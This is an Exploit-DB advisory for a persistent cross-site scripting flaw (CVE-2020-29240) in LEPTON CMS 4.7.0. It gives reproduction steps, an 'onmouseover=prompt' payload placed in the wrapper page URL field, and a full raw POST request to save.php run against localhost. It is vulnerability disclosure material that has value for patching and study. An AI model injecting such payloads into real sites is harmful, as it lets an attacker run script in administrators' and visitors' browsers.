LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting

EDB-ID:

49137




Platform:

PHP

Date:

2020-12-01


# Exploit Title: LEPTON CMS 4.7.0  - 'URL' Persistent Cross-Site Scripting
# Date: 19-11-2020
# Exploit Author: Sagar Banwa
# Vendor Homepage: https://lepton-cms.org/
# Software Link: https://lepton-cms.org/english/download/archive.php
# Version: 4.7.0
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29240

Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.

Vulnerable Parameters: Pages URL.

Steps-To-Reproduce:
1. Login to the Admin Account 
2. Go to the Menu-Pages-Pages Overview.
3. Now edit any page
4. Put the below payload in the url input box.
5.ex. https://localhost/_packinstall/"onmouseover=prompt(/xss/)>

POST /LEPTONmvkzycfafg/modules/wrapper/save.php?leptoken=a8274f4a99bb3c2d1d857z1606411062 HTTP/1.1
Host: localhost
Connection: close
Content-Length: 130
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://localhost/LEPTONmvkzycfafg/backend/pages/modify.php?page_id=1&leptoken=33bfc986e094ce5dd7655z1606411059
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: lep5031sessionid=75627dd11a0e789c4e560f7a93cd3153

page_id=1&section_id=1&url=https%3A%2F%2Flocalhost%2F_packinstall%2F%22onmouseover%3Dprompt%28%2Fxss%2F%29%3E+&height=900